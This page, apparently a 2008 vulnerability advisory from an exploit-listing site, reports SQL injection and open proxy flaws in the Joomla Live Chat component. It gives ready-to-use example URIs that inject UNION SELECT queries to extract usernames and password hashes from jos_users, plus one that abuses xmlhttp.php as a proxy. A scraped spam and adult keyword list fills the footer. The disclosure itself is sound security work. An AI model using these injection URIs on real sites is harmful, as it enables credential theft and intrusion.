about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities


Title Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
Published 2008-12-12-12:00AM
Updated 2008-12-15-08:51PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  jdc
Vulnerable  Joompolitan Joomla Live Chat 0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs and exploit are available:http://www.example.comadministrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_usershttp://www.example.com/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_usershttp://www.example.com/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.example2.com
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:01:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
80886.cn mmoinn.com sex arpia Linux SNMP S...ges/te namo local over mambo Remo Mail Admin Zeus cinenema.c CMS is Fre Maho /search/ex news for c film sexy free india Www.desipa Microsoft www.gxi163 girls figh news for c /search/ex creatorche 89SEX.COM 2007 IE india sexy i...buy.ua mambo Remo buju banto ww89.com 200 /compo www.dnfwgx dragon fab man .html/ JSP exploi 12345 metart free sex 8 200 /compo www.xayf.c www.dnfwgx port 6891 netgear ba www.xayf.c girl.s www.newduw mambo Remo www.bangla Vanganh-th